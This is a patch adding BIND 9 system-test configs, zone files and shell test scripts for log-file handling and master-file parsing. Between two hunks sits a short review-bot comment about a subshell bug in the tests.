+++ b/bin/tests/system/logfileconfig/ns1/named.iso8601.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "named_iso8601";
+ print-time iso8601;
+ severity debug 9;
+ };
+ category default { default_log; default_debug; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.pipeconf.in b/bin/tests/system/logfileconfig/ns1/named.pipeconf.in
new file mode 100644
index 0000000..5497b62
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.pipeconf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "named_pipe";
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.plain.in b/bin/tests/system/logfileconfig/ns1/named.plain.in
new file mode 100644
index 0000000..53a1946
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.plain.in
@@ -0,0 +1,50 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "named_log";
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+
+ channel query_log {
+ file "query_log";
+ print-time yes;
+ buffered yes;
+ };
+ category queries { query_log; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.plainconf.in b/bin/tests/system/logfileconfig/ns1/named.plainconf.in
new file mode 100644
index 0000000..8a70ca0
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.plainconf.in
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.symconf.in b/bin/tests/system/logfileconfig/ns1/named.symconf.in
new file mode 100644
index 0000000..5b30e57
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.symconf.in
@@ -0,0 +1,43 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ file "named_sym";
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.tsconf.in b/bin/tests/system/logfileconfig/ns1/named.tsconf.in
new file mode 100644
index 0000000..4b0f8af
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.tsconf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ buffered no;
+ file "named_ts" versions 3 size 1000 suffix timestamp; # small size
+ severity debug 100;
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+
+ channel query_log {
+ file "query_log";
+ print-time yes;
+ buffered yes;
+ };
+ category queries { query_log; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.unlimited.in b/bin/tests/system/logfileconfig/ns1/named.unlimited.in
new file mode 100644
index 0000000..506b49b
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.unlimited.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ buffered no;
+ file "named_unlimited" versions unlimited size 1000;
+ severity debug 100;
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+
+ channel query_log {
+ file "query_log";
+ print-time yes;
+ buffered yes;
+ };
+ category queries { query_log; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/ns1/named.versconf.in b/bin/tests/system/logfileconfig/ns1/named.versconf.in
new file mode 100644
index 0000000..3860ae8
--- /dev/null
+++ b/bin/tests/system/logfileconfig/ns1/named.versconf.in
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ dnssec-validation no;
+ recursion no;
+ notify yes;
+};
+
+logging {
+ channel default_log {
+ buffered no;
+ file "named_vers" versions 5 size 1000; // really small size
+ severity debug 100;
+ print-time yes;
+ };
+ category default { default_log; default_debug; };
+ category lame-servers { null; };
+
+ channel query_log {
+ file "query_log";
+ print-time yes;
+ buffered yes;
+ };
+ category queries { query_log; };
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { "rndc-key"; };
+};
+
+key rndc-key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/logfileconfig/setup.sh b/bin/tests/system/logfileconfig/setup.sh
new file mode 100644
index 0000000..0e0cc89
--- /dev/null
+++ b/bin/tests/system/logfileconfig/setup.sh
@@ -0,0 +1,19 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.plain.in ns1/named.conf
diff --git a/bin/tests/system/logfileconfig/tests.sh b/bin/tests/system/logfileconfig/tests.sh
new file mode 100644
index 0000000..2cfb558
--- /dev/null
+++ b/bin/tests/system/logfileconfig/tests.sh
@@ -0,0 +1,244 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh +THISDIR=`pwd` +CONFDIR="ns1" + +# Test given condition. If true, test again after a second. Used for testing +# filesystem-dependent conditions in order to prevent false negatives caused by +# directory contents not being synchronized immediately after rename() returns. +test_with_retry() { + if test "$@"; then + sleep 1 + if test "$@"; then + return 0 + fi + fi + return 1 +} + +status=0 +n=0 + +echo_i "testing log file validity (named -g + only plain files allowed)" + +# First run with a known good config. 
+n=$((n+1)) +echo_i "testing log file validity (only plain files allowed) ($n)" +ret=0 +cat /dev/null > ns1/named_log +copy_setports ns1/named.plainconf.in ns1/named.conf +nextpart ns1/named.run > /dev/null +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try directory, expect failure +n=$((n+1)) +echo_i "testing directory as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +copy_setports ns1/named.dirconf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try pipe file, expect failure +n=$((n+1)) +echo_i "testing pipe file as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +rm -f ns1/named_pipe +if mkfifo ns1/named_pipe >/dev/null 2>&1; then + copy_setports ns1/named.pipeconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping pipe test (unable to create pipe)" +fi + +# Now try symlink file to plain file, expect success +n=$((n+1)) +echo_i "testing symlink to plain file as log file ($n)" +ret=0 +rm -f ns1/named_log ns1/named_sym +touch ns1/named_log +if ln -s $(pwd)/ns1/named_log $(pwd)/ns1/named_sym >/dev/null 2>&1; then + nextpart ns1/named.run > /dev/null + copy_setports ns1/named.symconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping symlink test (unable to create symlink)" +fi + +echo_i "repeat previous tests without named -g" 
+copy_setports ns1/named.plain.in ns1/named.conf +$PERL ../stop.pl --use-rndc --port ${CONTROLPORT} logfileconfig ns1 +cp named1.args ns1/named.args +start_server --noclean --restart --port ${PORT} ns1 + +n=$((n+1)) +echo_i "testing log file validity (only plain files allowed) ($n)" +ret=0 +cat /dev/null > ns1/named_log +copy_setports ns1/named.plainconf.in ns1/named.conf +nextpart ns1/named.run > /dev/null +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration succeeded" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try directory, expect failure +n=$((n+1)) +echo_i "testing directory as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +copy_setports ns1/named.dirconf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Now try pipe file, expect failure +n=$((n+1)) +echo_i "testing pipe file as log file ($n)" +ret=0 +nextpart ns1/named.run > /dev/null +rm -f ns1/named_pipe +if mkfifo ns1/named_pipe >/dev/null 2>&1; then + copy_setports ns1/named.pipeconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration failed: invalid file" ns1/named.run || ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping pipe test (unable to create pipe)" +fi + +# Now try symlink file to plain file, expect success +n=$((n+1)) +echo_i "testing symlink to plain file as log file ($n)" +ret=0 +rm -f ns1/named_log ns1/named_sym +touch ns1/named_log +if ln -s $(pwd)/ns1/named_log $(pwd)/ns1/named_sym >/dev/null 2>&1; then + nextpart ns1/named.run > /dev/null + copy_setports ns1/named.symconf.in ns1/named.conf + rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n + wait_for_log 5 "reloading configuration succeeded" ns1/named.run 
|| ret=1 + if [ "$ret" -ne 0 ]; then echo_i "failed"; fi + status=$((status+ret)) +else + echo_i "skipping symlink test (unable to create symlink)" +fi + +echo_i "testing logging functionality" +n=$((n+1)) +ret=0 +echo_i "testing iso8601 timestamp ($n)" +copy_setports ns1/named.iso8601.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +grep '^....-..-..T..:..:..\.... ' ns1/named_iso8601 > /dev/null || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing iso8601-utc timestamp ($n)" +ret=0 +copy_setports ns1/named.iso8601-utc.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +grep '^....-..-..T..:..:..\....Z' ns1/named_iso8601_utc > /dev/null || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing explicit versions ($n)" +ret=0 +copy_setports ns1/named.versconf.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_vers.1480039317 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +$DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +# we are configured to retain five logfiles (a current file +# and 4 backups). so files with version number 5 or higher +# should be removed. 
+test_with_retry -f ns1/named_vers.1480039317 && ret=1 +test_with_retry -f ns1/named_vers.5 && ret=1 +test_with_retry -f ns1/named_vers.4 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing timestamped versions ($n)" +ret=0 +copy_setports ns1/named.tsconf.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_ts.1480039317 +# a timestamp version number +touch ns1/named_ts.20150101120000120 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +_found2() ( + $DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n + grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 + + # we are configured to keep three versions, so the oldest + # timestamped versions should be gone, and there should + # be two or three backup ones. + [ -f ns1/named_ts.1480039317 ] && return 1 + [ -f ns1/named_ts.20150101120000120 ] && return 1 + set -- ns1/named_ts.* + [ "$#" -eq 2 -o "$#" -eq 3 ] || return 1 +) +retry_quiet 5 _found2 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing unlimited versions ($n)" +ret=0 +copy_setports ns1/named.unlimited.in ns1/named.conf +# a seconds since epoch version number +touch ns1/named_unlimited.1480039317 +rndc_reconfig ns1 10.53.0.1 > rndc.out.test$n +$DIG version.bind txt ch @10.53.0.1 -p ${PORT} > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +test_with_retry -f ns1/named_unlimited.1480039317 || ret=1 +test_with_retry -f ns1/named_unlimited.4 || ret=1 +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "testing default logfile using named -L file ($n)" +ret=0 +$PERL ../stop.pl logfileconfig ns1 +cp named2.args ns1/named.args +test -f ns1/named.pid && ret=1 +rm -f ns1/named_deflog +copy_setports ns1/named.plainconf.in ns1/named.conf +start_server --noclean --restart --port ${PORT} ns1 +[ -f "ns1/named_deflog" ] || ret=1 +if [ "$ret" -ne 0 ]; 
then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/masterfile/clean.sh b/bin/tests/system/masterfile/clean.sh new file mode 100644 index 0000000..97aa377 --- /dev/null +++ b/bin/tests/system/masterfile/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f checkzone.out* +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/masterfile/knowngood.dig.out b/bin/tests/system/masterfile/knowngood.dig.out new file mode 100644 index 0000000..d4cbac8 --- /dev/null +++ b/bin/tests/system/masterfile/knowngood.dig.out 
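Review bot: In `_found2` the dig status check ends in `|| ret=1`, but the function body is a `( … )` subshell, so that assignment never reaches the caller and a non-NOERROR answer cannot fail the "timestamped versions" test. Inside the subshell the check should read `grep "status: NOERROR" dig.out.test$n > /dev/null || return 1`, matching the `return 1` lines that follow it. Separately, `THISDIR` and `CONFDIR` are assigned at the top and not used anywhere in the hunk, and the two `ln -s $(pwd)/ns1/named_log $(pwd)/ns1/named_sym` calls leave `$(pwd)` unquoted, which breaks when the build path contains spaces.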
@@ -0,0 +1,32 @@ +include. 300 IN SOA ns.include. hostmaster.include. 1 3600 1800 1814400 3600 +include. 300 IN NS ns.include. +a.include. 300 IN A 10.0.0.1 +a.include. 300 IN A 10.0.0.99 +a.a.include. 300 IN A 10.0.1.1 +b.foo.a.include. 300 IN A 10.0.2.2 +b.include. 300 IN A 10.0.0.2 +a.b.include. 300 IN A 10.0.1.1 +c.b.include. 300 IN A 10.0.0.3 +b.foo.b.include. 300 IN A 10.0.2.2 +ns.include. 300 IN A 127.0.0.1 +include. 300 IN SOA ns.include. hostmaster.include. 1 3600 1800 1814400 3600 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN NS ns.ttl2. +a.ttl2. 1 IN TXT "inherited ttl 1" +b.ttl2. 2 IN TXT "explicit ttl 2" +c.ttl2. 2 IN TXT "inherited ttl 2" +d.ttl2. 3 IN TXT "default ttl 3" +e.ttl2. 2 IN TXT "explicit ttl 2" +f.ttl2. 3 IN TXT "default ttl 3" +ns.ttl2. 1 IN A 10.53.0.1 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 +ttl2. 1 IN NS ns.ttl2. +a.ttl2. 1 IN TXT "inherited ttl 1" +b.ttl2. 2 IN TXT "explicit ttl 2" +c.ttl2. 2 IN TXT "inherited ttl 2" +d.ttl2. 3 IN TXT "default ttl 3" +e.ttl2. 2 IN TXT "explicit ttl 2" +f.ttl2. 3 IN TXT "default ttl 3" +ns.ttl2. 1 IN A 10.53.0.1 +ttl2. 1 IN SOA ns.ttl2. hostmaster.ttl2. 1 3600 1800 1814400 3 diff --git a/bin/tests/system/masterfile/ns1/include.db b/bin/tests/system/masterfile/ns1/include.db new file mode 100644 index 0000000..149c819 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/include.db 
@@ -0,0 +1,35 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; Test $INCLUDE current domain name and origin semantics + +$TTL 300 +@ IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3600 + ) + NS ns + +ns A 127.0.0.1 + +a A 10.0.0.1 +$INCLUDE sub.db a +; use the current domain name + A 10.0.0.99 +b A 10.0.0.2 +$ORIGIN b +$INCLUDE sub.db +; use the current domain name +; A 10.0.0.99 +c A 10.0.0.3 diff --git a/bin/tests/system/masterfile/ns1/named.conf.in b/bin/tests/system/masterfile/ns1/named.conf.in new file mode 100644 index 0000000..5ab72a5 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/named.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +zone "include" { + type primary; + file "include.db"; +}; + +zone "ttl1" { + type primary; + file "ttl1.db"; +}; + +zone "ttl2" { + type primary; + file "ttl2.db"; +}; 
diff --git a/bin/tests/system/masterfile/ns1/sub.db b/bin/tests/system/masterfile/ns1/sub.db new file mode 100644 index 0000000..7e027b0 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/sub.db @@ -0,0 +1,15 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +a A 10.0.1.1 +$ORIGIN foo +b A 10.0.2.2 + diff --git a/bin/tests/system/masterfile/ns1/ttl1.db b/bin/tests/system/masterfile/ns1/ttl1.db new file mode 100644 index 0000000..56afe9d --- /dev/null +++ b/bin/tests/system/masterfile/ns1/ttl1.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +a TXT "soa minttl 3" +b 2 TXT "explicit ttl 2" +c TXT "soa minttl 3" +$TTL 1 +d TXT "default ttl 1" +e 4 TXT "explicit ttl 4" +f TXT "default ttl 1" diff --git a/bin/tests/system/masterfile/ns1/ttl2.db b/bin/tests/system/masterfile/ns1/ttl2.db new file mode 100644 index 0000000..778e8d3 --- /dev/null +++ b/bin/tests/system/masterfile/ns1/ttl2.db 
@@ -0,0 +1,30 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 1 IN SOA ns hostmaster ( + 1 ; serial + 3600 + 1800 + 1814400 + 3 + ) + NS ns +ns A 10.53.0.1 +a TXT "inherited ttl 1" +b 2 TXT "explicit ttl 2" +c TXT "inherited ttl 2" +$TTL 3 +d TXT "default ttl 3" +e 2 TXT "explicit ttl 2" +f TXT "default ttl 3" + + + diff --git a/bin/tests/system/masterfile/ns2/example.db b/bin/tests/system/masterfile/ns2/example.db new file mode 100644 index 0000000..414403a --- /dev/null +++ b/bin/tests/system/masterfile/ns2/example.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2010042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/masterfile/ns2/named.conf.in b/bin/tests/system/masterfile/ns2/named.conf.in new file mode 100644 index 0000000..1f4ef91 --- /dev/null +++ b/bin/tests/system/masterfile/ns2/named.conf.in 
@@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + dnssec-validation yes; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; + +zone "missing" { + type primary; + file "missing.db"; +}; diff --git 